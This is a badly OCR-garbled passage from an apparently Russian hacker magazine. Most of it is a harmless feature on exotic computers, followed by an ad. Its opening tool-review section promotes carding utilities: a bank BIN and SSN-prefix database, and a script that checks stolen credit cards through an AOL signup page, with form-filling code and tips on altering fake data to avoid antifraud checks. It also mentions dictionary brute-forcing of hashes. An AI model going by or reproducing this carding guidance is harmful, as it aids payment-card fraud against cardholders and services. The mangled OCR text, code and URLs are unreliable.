ный момент АбѵапсесІ ІѴЮ5 Яесоѵегу умеет 
брутить только по словарю, но это ни сколько 
неумаляетее главного достоинства — быстро- 
действия. Перед запуском тебе достаточно 
указать хэш и путь к увесистому словарику, 
после чего можно расслабиться и ждать 
окончания перебора. Конечно, по объему 
своих возможностей программа не стоит в 
одном ряду с альтернативным софтом, но по 
скорости брутаонавне конкуренции. Одним 
словом, боѵѵпІоаб->гип->ЬгіЛе. 



ПРОГРАММА: 

ОС: 

АВТОР: 




Помнится, в одном из прошлых выпусков 
журнала я выкладывал в «Х-Тооіз» утилу 
под названием СС2Вапк, содержащую в 
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сѳбѳ базу бинов банков и другую полезную 
информацию. Сегодня я хочу представить 
тебе ее прямого конкурента — Магз Вапкз 
Вазе. Признаться, при первом знакомстве 
с этой тулзой я некоторое время пребывал 
в состоянии аута. И это неудивительно. 
Ведь программа имеетогромное количест- 
во возможностей! Здесь есть все, начиная 
бинами и заканчивая первыми тремя циф- 
рами ззп в зависимости от штата. Ты мо- 
жешь без труда пробить нужный бин, найти 
постоянно занятый номер телефона или 
просмотреть список всех штатов ІІЗАи II К. 
Вот л ишь часть менютулзы: АВВАЫитЬегз, 
Яоиііпд ЫитЬегз, В I N з — МазіегСагсІ, 
ВІ N3 — ѴІЗА, ВІІЧз— АМЕХ, ЕІ5А 2ІР Собез, 
ІІЗА Визу РИопез, 8814, ІІЗА 8іаіез и т. д. 

Для примера пробьем по базе бин 373703: 



ВІ N : 373703Н 

Вапк СоипІгу:Ц|\]ІТЕР_ЗТ АТЕЗ_ОВ_АМЕВІСА| 
Сагб Туре: АМЕХ_ОРТІМАИ 

Вапк РПопе: 800-635-5955И 



Каквидишь.креда — АМЕХ_ОРТІМА. А ведь 
во многих схожих программах базы бинов 
АМЕХ'а и вовсе нет. Также можно перейти 
на вкладку ззп и просмотреть цифры, на 
которые начинаются номераззп, выданных 
в Нью-Йорке: 



050: І\ІЕѴѴ_ѴОЯК 
133: І\ІЕѴѴ_ѴОВК 



Кроме того, особый интерес представляет 
раздел «ІІЗА Визу Ріюпез». Пара номерков 
для того же Нью-Йорка: 




В общем, настоятельно рекомендую исполь- 
зовать именно Магз Вапкз Вазе. Разработчи- 
ки учли все до мельчайших деталей. В утиле 
есть даже раздел «ІЧоіез», который выпол- 
няет роль обычного блокнота =). А по коли- 
честву бинов, номеров телефонов и прочей 
информации программа является одной из 
самых полных. 

ПРОГРАММА: 

ОС: 

АВТОР: 

Если твоя база с картоном разрослась до 
немыслимых размеров, то эта тулза пред- 



Щ сс_|аѵа - ѴѴогсІРаСІ 



Файл Правка Вид Вставка Формаі 

окгІУІ #іы йі .*!> 

соипъ++; 



> Сорец скрипта для чека валидности сс 

назначена именно для тебя. Скорее всего 
тебя не прикалывает брать по одной кар- 
тонке и проверять их вручную (например, 
вбивая карту на платных порносайтах). 
Куда приятнее автоматизировать данный 
процесс с помощью ДЗ Сгесііі: Сагб Сііескег. 
Этот чекер валидности кредитных карт на- 
писан на 33 и работает через сайт АОІ_'а. 
С его помощью ты сможешь отобрать ва- 
лидные картонки из своей базы. Чекер от- 
мечает таковые знаком «+», а невалидные 
— «-». 33 Сгесііі Сагб СНескег умеет рабо- 
тать с картами Эізсоѵег ІЧеіѵѵогк, Атегісап 
Ехргезз, МазіегСагсІ, ѴІЗА. Кроме того, 
имеется поддержка ргоху, что не может 
не радовать. Порядок запуска предельно 
прост при имеющемся іхі-файле: 



сзсгірі сс. ]з > файл_результата. іхі (обрати] 
внимание, что используются стандартные! 
средства из %\д/іпбіг%\зузіет32\)И 



Перед использованием чекера, тебе следу- 
етуказать всего 3 параметра (в скрипте): 




Первый — собственно номер картонки, 
которую необходимо прочекать; второй — 
произвольный логин; третий — произволь- 
ный пасс. Последние 2 параметра необхо- 
димы для успешного обращения скрипта к 
сервису АОЛа. Послетого как ты прописал 
все нужные данные, чекер коннектится на 
адрес: ПіірѴ/ігее.аоІ.сот/ігѵаоІігее/іпсІехЗ. 
абр?ргото=7691 21 &ргото2= 53231 З&ргот 
оЗ=532314&зегѵісе=аоІ . где заполняет со- 
держимое полей твоими данными. Кстати, 
остальную часть вбиваемой чекером инфы 
ты тоже можешь изменить, чтобы не трево- 
жить лишний раз антифрод АОІ_'а: 



іе.боситепі.тет_іпіо.іпате.ѵаІие = "ЗоИп";И 
іе.боситепі.тет_іпіо.Іпате.ѵаІие = "5тііИ"д 
іе.боситепі.тет_іпіо.аббг1 .ѵаіие = "Міга 434 
іе.боситепі.тет_іпіо.аббг2.ѵаІие « "Міга 1 6";| 
іе.боситепі.тет_іпіо.сііу. ѵаіие = "ЫеѵѵУогкЧ 
іе.боситепі.тет_іпіо.зіаіе. ѵаіие = "І\ІУ";И 
іе.боситепі.тет_іпіо. 2 Ір. ѵаіие = "53412^И 
іе.боситепі.тет_іпіо.еріюпе.ѵаІие И 



"689935781 0";Н 

іе.боситепі.тет_іпіо.ет аіІ. ѵаіие 
"доос!тап@уаіюо.сот";И 



Что есть что, думаю, объяснять не требует- 
ся:). Изменив стандартные данные на свои 
и запустив чекер, ты сможешь без проблем 
проверить интересующий тебя картон. 

ПРОГРАММА: 

ОС: 

АВТОР: 

Как ты уже успел заметить, автор данной 
тулзы — я =). Дело в том, что однажды ко 
мне в асю стукнул РогЬ и попросил вы- 
ложить в «Х-Тооіз» утилу, способную не 
просто работать в роли хуизера (для оп- 
ределения регистрационной информации 
о хосте), но и создавать лог-отчеты с дан- 
ными о нескольких хостах. Поразмыслив, я 
залез сначала в гугл, но ничего полезного 
не нашел. Тогда, обойдя с десяток хак-пор- 
талов и опросив нескольких знакомых, я 
понял, что найти прогу не удастся. Выход 
как обычно оставался один — написать 
тулзу самому. Изначально я планировал 
сделать релиз на С в двух версиях: под 
ѵѵіп- и под *піх-платформы. Но в связи с 
нехваткой времени (спасибо преподам из 
института), решил кодить на ріір. Сорец 
очень прост, и ты убедишься в этом сам, 
заглянув на наш ЭѴЭ. Ничего сверхслож- 
ного в моем скрипте нет. В файле ііозіз. 
іхі лежит список хостов, инфу на которые 
нужно получить, ав Іод. іхі сохраняется лог 
с этой инфой. В случае если соединение с 
ѵѵіпоіз-сервером осуществить не удалось, 
скрипт выдаст соответствующее сооб- 
щение и завершит свою работу. Ты также 
можешь изменить адрес хуиз-сервиса, на 
который посылаются запросы. Кстати, в 
следующих версиях я собираюсь сделать 
поддержку ѵѵіп о і з-листа. То есть значение 
адреса хуиза будет заменено перемен- 
ной, а сами урлы будут лежать в специаль- 
но предназначенном для этого файлике (в 
ѵѵіізі.іхі, например). Это позволитобходить 
различные ограничения (таймауты, лими- 
ты, еіс), установленные на ѵѵіюіз-серве- 
рах. Этаверсия Мазз.ѴѴііоізег'а — 0.1-Ьеіа, 
так что со всеми вопросами/предложени- 
ями мыль на гОіб@таіІ.ги, может быть твоя 
идея поможет обществу =). В следующих 
версиях скрипт перерастет в полноцен- 
ную софтину, жди обновлений:). И, нако- 
нец, специально для ѵѵіп-пользователей я 
выложил скомпилированную версию МаіІ 
ѴѴііоізег. Епіоу ! . НС 
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ИЛЬЯ АЛЕКСАНДРОВ 

/ ІЬѴА АЬС РАМСЬСП.ПУ / 



ОБЫКНОВЕННЫЕ ЧУДЕСА 




КАКИЕ АССОЦИАЦИИ ВЫЗЫВАЕТ 
УТЕБЯ СЛОВО «КОМПЬЮТЕР»? ТВОЙ 
СТАРЫЙ ЗАПЫЛЕННЫЙ СИСТЕМНИК 
ВКУПЕ С ЖИДКОКРИСТАЛЛИЧЕСКОЙ 
«СЕМНАШКОЙ»? ЧТО ЖЕ, ЗАЙМЕМСЯ 
РАСШИРЕНИЕМ ТВОЕГО КРУГОЗОРА. 
ПРИГОТОВЬСЯ ЧИТАТЬ О САМЫХУНИ- 
КАЛЬНЫХ КОМПЬЮТЕРАХ - 
ОТ САМОДЕЛЬНЫХ РАЗРАБОТОК 
ДО МОЩНЕЙШИХ СТАНЦИЙ НАУЧНЫХ 
ЛАБОРАТОРИЙ, ОТ НАЛАДОННИКА 
РАЗМЕРОМ СО СПИЧЕЧНЫЙ КОРОБОК 
ДО АППАРАТНОГО ОБЕСПЕЧЕНИЯ МКС. 



иасмявмиидмнмяЕімди 



«КТО ЗНАЛ, ЧТО БУДУЩЕЕ НАСТУПИТ 
ТАК СКОРО?» 

ФРАЗА ИЗ РЕКААМЫ АВЮМОБИАЬНОГО 
КОНЦЕРНА ВМѴѴ 



РОБОТИЗИРОВАННЫЙ КОСТЮМ НАЬ-3 

Наиболее распространено использование 
других, отличных от персональных, ком- 
пьютеров в робототехнике. Про роботов 
«Хакер» писал достаточно — и про собач- 
ку АіЬо, и про человекообразных кибор- 
гов-уборщиц. Но недавно японские ученые 
порадовали нас новым изобретением. Ус- 
тройство под названием НАЬ-3 представляет 
собой электрические штаны, прикреплен- 
ные к телу электроприводами, и рюкзак, где 
находятся компьютер и батареи. Человек в 
подобных брюках может бегать и прыгать, 
не прилагая никаких, даже минимальных, 
физических усилий. Проект собираются 
распространять главным образом среди 
инвалидов, но им также уже заинтересова- 
лись военные ведомства. И это понятно — 
спецназовцы смогут бегать со скоростью 
хорошего мотороллера и не выдыхаться. 
НАЬ-3 создан лабораторий СуЬегпісз, в 
своей работе объединяющей математику, 
физику, кибернетику и медицину. 



Интерес вызывает принцип работы этого изоб- 
ретения. У кибер-штанов нет никакого пультауп- 
равления, только подключенные к телу датчики 
и провода. Центральный компьютер получает 
импульс головного мозга и преобразует его в 
машинный код, после чего устройство начинает 
работать по обычному для робототехники алго- 
ритму. Таким образом, управление осуществля- 
ется только с помощью нейротоков человека! 
Это открывает возможность создания «экзос- 
келета» — кибернетического костюма, целиком 
покрывающего тело человека. В результате, 
в ближайшем будущем события фильма «Ро- 
бокоп» могут перестать относиться к разряду 
фантастических. 

КОМПЬЮТЕР, 

УПРАВЛЯЕМЫЙ ГЛАЗАМИ 

Мышки и клавиатуры — это прошлый век. 
Шведские товарищи из компании ТоЬіі 
ТесИпоІоду изобрели компьютер, которым 
можно управлять исключительно движе- 
ниями глаз. Устройство МуТоЬіі РІО являет- 



ся портативным, а его дисплей реагирует 
на малейшие колебания глазных яблок и 
головы в целом. Кроме того, чудо техники 
функционирует при любом освещении, 
и даже наличие контактных линз или оч- 
ков у пользователя не помешает работе! 
Перед ее началом надо потратить 30 се- 
кунд, отслеживая глазами перемещение 
точки по экрану. После этого взглядом 
можно открывать и закрывать приложе- 
ния, редактировать документы и серфить 
веб-пространство. Клавиатура использу- 
ется виртуальная, что очень непривычно, 
но при таком способе управления к ней 
быстро приспосабливаешься. Конечно, 
простой смертный освоит работу на этом 
компе не сразу — предстоит немало часов 
тренировки. 

МуТоЬіі РІО работает под ѴѴіпсіоѵѵз ХР, аппарат- 
ная часть основана на ІпіеІ Репііит 4 с тактовой 
частотой 1300 мегагерц. По формату компьютер 
не больше 15-дюймового ноутбука. Он может 
быть прикреплен к столу или стене. 
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Ты, наверное, спросишь, причем тут Сцена? Эта статья открывает новый цикл, в котором 
ты узнаешь о сообществе разработчиков специфичного железа и необычных компью- 
теров, о том, ка кони создаются, кто их заказывает, сколько стоят исследования и кто 
главные специалисты в этой области. Причем, узнаешь из первых рук, так как мы возь- 
мем интервью у лучших ученых и энтузиастов-железячников мира. Оставайся на связи. 



Единственное, что не позволяет прямо сей- 
час пойти и выкинуть мышку с клавой, — это 
цена МуТоЬіі, составляющая порядка 17-ти 
тысяч долларов. 

О СУПЕРКОМПЬЮТЕРАХ 

Термин «суперкомпьютеры» уже набил ос- 
комину. Все мы знаем, что это огромные, как 
аэродром, махины с феноменальной вычис- 
лительной мощью. И что по прошествии де- 
сятка лет такие компьютеры, уменьшившись 
в размерах, стоят под столом в каждом доме. 
Но, как не крути, во многом благодаря именно 
этим сверхмощным вычислительным комплек- 
сам развивается вся ІТ-индустрия. 

Итак, на сегодняшний день самым мощным 
компьютером в мире является ВІие Оепе/І_. Раз- 
работка ІВМ осуществляется в США, в Ливер- 
морской национальной лаборатории имени 
Лоуренса. Производительность комплекса 
составляет 280,6 терафлопс — число, постиг- 
нуть которое человеческий разум не в силах 
(один терафлопс равен триллиону операций 
с плавающей запятой в секунду). Для срав- 
нения — производительность Репііит 43060 
мегагерц равна 4,2 гигафлопс. 

ВІие Оепе/1_ занимает площадь, равную поч- 
ти четырем баскетбольным площадкам! Ко- 
личество потребляемой им электроэнергии 
таково, что ее хватило бы для электрифи- 
кации небольшого города. Вся эта красота 
используется химиками, генетиками и про- 
чими учеными, изобретающими вакцины от 
птичьего гриппа и выводящими новые сорта 
растений. Акакнаподобной машинешел бы 
ОООМ 3, они и не догадываются. . . 

На широких просторах бывшего Советско- 
го Союза ситуация с суперкомпьютерами 
сложнее. У нас тут единственная гордость 
— М ВС-1 5000 В М, установленный в Межве- 
домственном суперкомпьютерном центре 
РАН. В нем использованы 924 процессора 
ІВМ РоѵѵегРС 970. Большинство суперком- 
пьютеров создаются именно по подобной 
технологии, предполагающей соединение 
нескольких сот микропроцессоров в одном 
блоке. 



За развитием рынка мощнейших вычисли- 
тельных комплексов постоянно наблюдают. 
Создаются рейтинги, где лидеры меняются 
быстрее, чем наФормуле-1. 

Наибольшее количество суперкомпьютеров 
произведено ІВМ, на втором месте находится 
НеѵѵІей-РаскагсІ. Что касается процессоров, 
на базе которых создаются эти компьютеры, 
то чаще всего здесь используется ІпіеІ. АМЭ и 
ІВМ роѵѵег встречаются значительно реже. 

РАЗМЕР ИМЕЕТЗНАЧЕНИЕ 

Перейдем от огромных кластеров к мини- 
атюрным приборам. Самые умные ученые 
в мире, как всем известно, живут в Стране 
восходящегосолнца. И компьютерТеасиЬе 
— еще одно тому подтверждение. ТеасиЬе 
представляет собой системный блок, ра- 
ботающий на специфическом процессоре 
ІЧЕС МІР5, который проигрывает Іпіеі и АМ О 
в производительности, но обладает совер- 
шенно микроскопическими размерами. 
Компьютер имеет 64 мегабайта памяти и 
флеш-накопитель. У него есть все необхо- 
димые интерфейсы: 115В, Я5-232, сетевая 
карта, разъем для подключения дисплея. 
Весь фокус в том, что ТеасиЬе в объеме за- 
нимает всего 5 квадратных сантиметров! 

С компьютером идет свой набор програм- 
много обеспечения, включающий все самое 
необходимое: браузер, текстовый редактор, 
почтовик. ѴѴіпсІоѵѵз на этом устройстве пока 
не функционирует. 

По словам одного из руководителей проек- 
та, его всегда раздражал и массивные корпу- 
сы персональных компьютеров и он решил 
сконструировать нечто более компактное. 
После появления компьютера размером с 
книгу ученый задумался о том, как далеко 
могут зайти эксперименты, и результат пре- 
взошел все ожидания. 

ЭВОЛЮЦИЯ КПК 

Если бы я писал эту статью году в 2010, 
этого абзаца бы не было, потому что Шіга- 
МоЬіІе РС (ІІМРС) через несколько лет на- 
верняка будут у каждого. Сейчас же обла- 



дателей подобных устройств единицы. Итак, 
ІІМРС — это новый тип мобильных компью- 
теров, нечто среднее между планшетом и 
КПК. Впервые подобная разработка была 
создана МісгозоЙ. Мысль Гейтса и Ко была 
развита американской компанией с длин- 
ным и пафосным названием ВІаск ОіаппопсІ 
АбѵапсесІ Тесігпоіоду. Аппарат ЗѵѵіісЬВаск 
РС имеет экран в 5,6 дюймов и облачен в 
ударостойкий корпус. Внутри него находит- 
ся Сеіегоп М с тактовой частотой 1 Ггц, 1 024 
мегабайта оперативной памяти, жесткий 
диск в 60 гигабайт, адаптеры ѴѴіРі и ВІиеіооіЬ. 
Какты понял, компьютер на порядок мощнее 
своих КПК-собратьев. Дисплей сенсорный, 
на передней панели полноценная ОѴѴЕВТѴ- 
клавиатура. Меня искренне поразило, что 
в Зхд/іТсГіВаск РС предустановленно сразу 
4 операционных системы — ѴѴіпсІоѵѵз ХР, 
ѴѴіпсІоѵѵз СЕ, ѴѴіпсІоѵѵз МоЫІе и І_іпих. Причем, 
между ними можно переключаться прямо во 
время работы. 

Так что, копи убитых енотов — скоро подоб- 
ные игрушки появятся в магазинах твоего 
города. 

ТАКИХ НЕ БЕРУТ В КОСМОНАВТЫ 

На Международной космической станции 
(МКС) тоже есть компьютеры. Некоторые 
из них управляют динамикой полета, дру- 
гие осуществляют термоконтроль, третьи 
контролируют бортовые системы. Всего на 
станции более стауправляющих компьюте- 
ров. Все они связаны специальной инфор- 
мационной сетью, наподобие обычных зем- 
ных БАМ . В итоге образуется иерархическая 
архитектура бортовой системы МКС. 
Начинается эта архитектура с системы ин- 
терфейса с экипажем. Переносные ком- 
пьютеры, в аппаратной части являющиеся 
обычными ноутбуками, здесь имеют нестан- 
дартную форму. Дело в том, что интерьер 
станции представляет собой коридоры с 
экранами, на которые выводится различная 
информация, и гнездами для подключения ус- 
тройств. Поэтому подсоединить портативный 
компьютер к системе можно в любой части 
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станции. На компьютерах системы интер- 
фейса с экипажем установлено специальное 
ПО, где изображены все модули (отделения) 
станции. Космонавт выбирает нужный ему 
модуль, потом находит необходимый пара- 
метр для конфигурации, например, электро- 
питание, или управление атмосферой. На от- 
дельных компьютерах иногда устанавливают 
привычный М3 0№се и средства для работы 
с электронной почтой, чтобы связь с родной 
планетой не пропадала. 

Основные же компьютеры, управляющие 
станцией, экипажу не видны. Некоторые 
из них находятся около датчиков, экранов, 
панелей, другие — снаружи станции, на 
антеннах и солнечных батареях. Все это 
электронное хозяйство работает по ста- 
рому доброму принципу магистрально-мо- 
дульной системы, то есть объединительной 
шиной, куда вставляются различные платы: 
микропроцессоры, накопители и т. д. 

Все компьютеры, изготавливаемые для 



космических станций, созданы по опреде- 
ленному стандарту. На МКС используется 
типичная архитектура ІпіеІ, доработанная 
под «космические» требования. Модульная 
система позволяет проводить апгрейды и 
в случае чего обеспечивает возможность 
оперативного ремонта. 

Основные компьютеры делятся натри катего- 
рии. Компьютеры первой, главной категории 
отвечают за режимы станции: отправление, 
стыковка с Землей, аварийная ситуация, ре- 
жим выхода в открытый космос. Компьютеры 
второй категории управляют модулями МКС 
и подсистемами: температурным режимом, 
давлением, освещением. И на низшем уровне 
располагаются вычислительные приборы, от- 
вечающие за конкретные датчики, тумблеры, 
светодиоды и прочие клапаны. 

АМЕРИКАНСКИЙ «САМОДЕЛКИН» 

Когда я готовил эту статью, я хотел помес- 
тить в обзор компьютер, собранный в «га- 



ражных» условиях. Но, увы, спаять из же- 
леза что-нибудь серьезное и уникальное, 
видимо, невозможно. Зато я наткнулся на 
человека, совместившего кофеварку и ПК. 
Ник Пелис очень много времени проводит 
за компьютером, и ходить на кухню, чтобы 
варить кофе, ему мешает лень. Вдобавок, 
он увлекается моддингом, и всегда хотел 
иметь необычный системный блок. 

В итоге парень купил себе большой и про- 
чный корпус, кофеварку за 1 5 баксов и засел 
за работу. Он изменил системы питания ПК, 
благодаря чему устройства стали исполь- 
зовать одну розетку. Также в корпус были 
добавлены дополнительные вентиляторы, 
которые выдували тепло по всему систем- 
ному блоку и отводили горячий воздух на- 
гревательных элементов кофеварки. При- 
шлось изменить направление вращения 
кулеров, что предотвращало конденсацию 
влаги на жестких дисках. Пелис вставил в 
системный блок прозрачные стекла, изоб- 



ДРУГИЕ ЭКЗОТИЧЕСКИЕ КОМПЬЮТЕРЫ ► 




БРИТАНСКИЕ 



(ученые изобрели мини-компьютер, 
осуществляющий мониторинг состояния здоровья па- 
циента. Устройство имеет микроскопические размеры 
и может быть с помощью пластыря приклеено к телу. 
Компьютер состоит из кремниевого чипа и датчиков, 
контролирующих температуру, давление и другие 
параметры состояния здоровья. Питается устройство 
от небольшой батарейки, которая используется обычно 
в электронных часах. Информация пересылается на 
мобильный телефон или на е-таіі лечащего врача, что 
позволяет ему контролировать протекание болезни на 
расстоянии. 



А ВОТ АРРР1.Е 



(опять озаботилась дизайном своих 

компьютеров. Компания запатентовала проект корпуса 
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со светящимися светодиодами. В документе фигу- 
рирует 36 пунктов, описывающих способ подсветки 
компьютера. По задумке создателей, корпус, какха- 
мелеон, меняет цвета, причем используется несколько 
десятков цветовых гамм. Что из этого получится, поль- 
зователи маков узнают в ближайшем будущем. 

же решила изготовить «гибкие» КПК. Эти ком- 
пьютеры будутлишены привычных кнопок, колесиков, 
тач-падов. Для управления КПК нужно будетособым 
образом сгибать прибор. Создатели утверждают, что 
особенно это будет удобно при работе с географи- 
ческими картами, и собираются внедрять устройство 
среди геологов и представителей схожих профессий. 
О технической стороне вопроса не сообщается. 
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разил на них кофейную чашечку, и мечта 
сбылась. Получился компьютер с эксклю- 
зивным моддингом, обеспечивающий, по- 
мимо всего прочего, еще и бесперебойное 
получение любимого напитка. 

Если ты хочешь повторить эксперимент 
американца, или тебе просто любопытны 
его технические подробности, описание ра- 
боты доступно по адресу: НПрѴ/ѵѵѵѵѵѵ.іНа.ги/ 
НоѵѵІо/200506241/іпсІех. НітІ 

БИОКОМПЬЮТЕР 

Оказывается, молекулаДНКможетбыть ис- 
пользована для процесса вычислений. Пер- 
вые эксперименты по разработке проектов 
биокомпьютеров проводились еще в 90-ые 
годы, но лишь не так давно прорыв в этой 
области совершили израильские ученые. 
Команда доктора Иакова Бененсона из 
Института Наук Вейцмана (что в Израи- 
ле) разработала реально действующую 
модель ДНК-компьютера. Устройство не 
требует внешнего питания и при этом об- 
ладает огромной производительностью. 
Размер компьютератаков, что в капле воды 
могут поместиться несколько триллионов 
«кибернетизированных» ДНК, которые 
способны совместно выполнять 66 милли- 
ардов операций в секунду. 

Это первая вычислительная машина, в ко- 
торой все — и устройство ввода/вывода, и 
аппаратная часть, и даже ПО — было со- 
здано из молекул. Ученые отмечают, что 
одним из главных достоинств биокомпью- 
тера является специально запущенный 
биохимический процесс, посредством 
которого выделяется достаточно энергии, 
чтобы не использовать внешние источники 
питания. 

Биохимические компьютеры позволяют 
хранить многократно больше информации 
и на меньших носителях, чем обычные ПК. 



Грамм высушенной ДНК может вобрать в 
себя столько информации, сколько помес- 
тится натриллионе компакт-дисков. 
Устройство израильских ученых функ- 
ционирует по принципу работы обычного 
персонального компьютера. Каждое вы- 
числительное действие требует двух до- 
полнительных молекул ДНК. Одна из них 
осуществляет ввод, другая исполняетроль 
программного обеспечения. 

К сожалению, пока биокомпьютер для пол- 
ноценной работы не пригоден — ученые 
еще не сумели реализовать мощности 
ДНК-устройств на практике. 

В каждом биокомпьютере обязательно 
должны быть датчики, которые можно на- 
звать «органами чувств». Химический дат- 
чик отвечает за состав вещества, соеди- 
няющегося или проходящего через ДНК, 
оптический датчик определяет форму 
вещества. Полученная информация пе- 
редается на процессор — самую сложную 
составляющую ДНК-компьютера. Про- 
цессор представляет собой постоянно 
меняющийся белковый раствор. Когда на 
него поступает информация, полученная с 
датчиков, частицы раствора меняют свои 
характеристики: цвет, форму, размер. По 
завершении реакции они принимают свой 
исходный вид. 

Какие преимущества у такого процессора 
перед «камушками» отіпіеі и АМЭ? Во-пер- 
вых, компактность, я бы даже сказал, мик- 
роскопичность. Во-вторых, надежность 
— биохимический компьютер практически 
не ошибается в вычислениях. Третье и са- 
мое главное преимущество — быстродейс- 
твие, многократно превышающее показа- 
тели кремниевых процессоров. 

Все сказанное выше — это смутные очер- 
тания будущего. Время биохимических ком- 
пьютеров придет значительно позже, лет 



через 20. Но то, что когда-нибудь мы станем 
свидетелями рождения компьютеров, кото- 
рые при размерах со спичечный коробок 
будут иметь быстродействие самых мощных 
суперкомпьютеров, бесспорно. 

БОРТОВОЙ КОМПЬЮТЕР 

Уделим внимание автомобилистам. Точнее, 
милому их сердцу прибору — бортовому 
компьютеру. Миіііігопісз М76, вмонтирован- 
ный в переднюю панель, уже сейчас стал 
серьезным помощником в пути. Компьютер 
обладает цветным дисплеем, что позволяет 
работать с электронными картами нашей 
Родины. Если ты являешься счастливым 
обладателем ОРЗ-приемника, компьютер 
покажет твое расположение на карте, под- 
скажет дорогу до ближайшего населенного 
пункта. 

МиІШгопісз М76 протестирует и оценит ем- 
кость аккумулятора, высушит свечи зажи- 
гания, позволит тебе корректировать тем- 
пературу в салоне. Компьютер посоветует, 
ехать медленнее, если ты превысишь ско- 
рость. Бортовой друг даже предупредит о 
возможности образования гололеда, не 
говоря уже о традиционном напоминании о 
том, что пора наполнить бензобак. 

Пока это все же экзотика, но очень скоро 
такое устройство будет находиться практи- 
чески в каждом автомобиле. 

ШАХ И МАТ 

Шахматы — игра древняя и, вне всякого сом- 
нения, требующая приложения некоторых 
умственных усилий. Люди, существа весьма 
гордые, признавать, что хотьвчем-томашина 
умнее их, не хотели. 1 997 год, когда чемпион 
мира Гарри Каспаров уступил детищу ІВМ 
— суперкомпьютеру Эеер ВІие, расставил 
все по своим местам. Эеер ВІие основан на 
системе В8/6000, состоящей из 32-х нодов, 



/ 101 



ХАКЕР 1 1 /95/ 06 





> Один из суперкомпьютеров 



по 6-ти процессоров каждый. В его построе- 
нии использовались процессоры ІВМ Роѵѵег, 
которые были модифицированы и увеличи- 
ли скорость просчета возможных позиций 
на шахматной доске с 2 до 7 миллионов 
операций в секунду. Специально для супер- 
компьютера была написана шахматная про- 
грамма на С, запущенная под операционной 
системой АІХ. Создатель компьютера, само 
собой, японец, ФенгСьюнг-Сутакже являет- 
ся неплохим шахматистом. 

В Оеер ВІиеудивляетто, что компьютер, по- 
хоже, обладаетпрактически человеческой 
логикой. Особенно много разговоров на 
эту тему появилось после того, как маши- 
на пожертвовала фигурой ради позицион- 
ного преимущества. Ранее считалось, что 
на такое способен только человек, а ком- 
пьютеру же, перебирающему все возмож- 
ные варианты тупым брутфорсом (пусть и 
очень быстро), стратегические хитрости 
недоступны. Более того, Оеер ВІие в паре 
партий допускал неестественные для шах- 
матной программы «зевки» — ему везде 
«мерещились» ферзи. Для исправления 
бага понадобилось около двух недель ра- 
боты лучших программистов ІВМ. 

Как бы там ни было, сегодня очевидно, что 
искусственный интеллект лучше челове- 
ческого приспособлен для настольных игр. 
А так как теперь и компьютеры мощнее, и 
программы совершеннее, турниры между 
людьми и электронно-вычислительными 
машинами больше не проводятся. 

ИГРОВЫЕ ПРИСТАВКИ 

Когда-то многие из нас были фанатами 
Оепсіу. Потом появилась Зеда... С тех пор 
мир приставкостроения шагнул далеко 



вперед. Ты, возможно, уже давно этим не 
интересовался, а потому я расскажу тебе 
об одной из самых мощных игровых консо- 
лей на сегодняшний день. 

ХЬох 360 от известного производителя 
мелкого софта и приставкой-то не назо- 
вешь. Производительность в один тераф- 
лопс является хорошим показателем даже 
для серверов в стенах научных лаборато- 
рий. Устройство снабжено трехъядерным 
процессором ІВМ РоѵѵегРС, тактовая час- 
тота каждого ядра — 3,2 гигагерца. Кеш 
— один мегабайт. 512 метров оперативки. 
Съемный жесткий диск на 20 гигабайт. 
Привод, читающий все форматы. Напом- 
ню, это игровая консоль, ане новая модель 
персонального компьютера! 

ХЬох может подключаться к интернету, имеет- 
ся даже разъем под ѴѴі-Рі. Джойстики — бес- 
проводные. В общем, мощное устройство. 
Конечно, есть еще Зопу, традиционно бо- 
лее популярная в нашей стране, Ріаузіаііоп 3. 
Но лично я с уверенностью сказать, что 
круче, не могу — не буду давать лишне- 
го повода холиварщикам. Но, судя по ха- 
рактеристикам ХЬох, его возможности 
в сфере 30 более чем обширны. И это 
тревожный звоночек для производителей 
компьютеров, ведь категории «геймеры» 
и ХЬох'ахватит вполне. Такзачем тратить- 
ся на более дорогие ПК (затем, что на ПК 
и выбор больше, и игры лучше. — Прим. 
тіпсІѵѵОгк)? 

ЦЕНТР «УМНОГО ДОМА» 

Об «умном доме», то бишь смартхаусе, ][ 
писал достаточно. Ну там, свет сам заго- 
рается, от бандитов жилище защищается 
и все в этом духе. Но, конечно, главное в 



интеллектуальном жилище — централь- 
ный компьютер. Вот, например, компания 
АсІѵапіесЬ выпустила на рынок домашний 
терминал ЕН-7Ю50. Терминал является 
интегратором систем термоконтроля, бе- 
зопасности и наблюдения, видео- и аудио- 
аппаратуры, то есть соединяет воедино 
все компоненты «умного дома» и центра- 
лизовано ими управляет. 

Аппаратная составляющая компьютера 
весьма скромна — ѴІА С3400 мегагерц и 
128 оперативки. Отображение информа- 
ции осуществляется посредством ТРТ- 
экрана в 10,4 дюймов. Управлять компью- 
тером можно с помощью радиопульта из 
любой точки квартиры. Встроенную каме- 
ру можно использовать для создания ви- 
деотелефона, когда это будет необходимо. 
Компьютер можно подключить к интерне- 
ту и управлять им удаленно. Например, 
заставлять смартхаус поливать цветочки, 
покаты загораешь на югах. 

Итак, для построения дома будущего ис- 
пользуется весьматривиальное железо, да 
и программная часть базируется наѴѴіпсІоѵѵз 
СЕ. Искусство инженеров и программистов 
даже заезженные разработки выводит на 
новыйуровень. 

Р5 

Как видишь, привычной персоналкой по- 
нятие «компьютер» не исчерпывается. 
Чего только не придумают корпорации 
и отдельные энтузиасты. Некоторые из 
этих экзотических компьютеров уже ста- 
ли частью нашей жизни, некоторым это 
только предстоит. Компьютерная эволю- 
ция продолжает свое победоносное шес- 
твие по миру. И-И 
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на правах рекламы 




О Что общего 



между 
и тостером 



доменом 



О И домен и тостер 
можно купить в 



кредит! 



Ѳ Хостинг-Центр РБК 

продает домены 
в кредит! 

Ѳ Первоначальный 
взнос - 



ф +7(495)363-0309 
НозТшд.гЬс.ш 
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ХАК-ГРУППЫ, РАБОТАЮЩИЕ В ТЕНИ 

СЕЙЧАС НЕ НУЖНО ОБЩАТЬСЯ В УЗКИХ КРУГАХ 5 ЕСОРІТУ-СО ОБЩЕСТВА, ЧТОБЫ СЛЫШАТЬ ТАКИЕ НАЗВАНИЯ, КАК МОО, 29А, 
ЕЕУЕ. ИНФОРМАЦИЯ О НИХ ТАК ЖЕ ОТКРЫТА, КАК ИСХОДНИКИ УЫОХ'А. НО В ТО ЖЕ ВРЕМЯ МНОГИЕ ГРУППЫ, ПЕРИОДИ- 
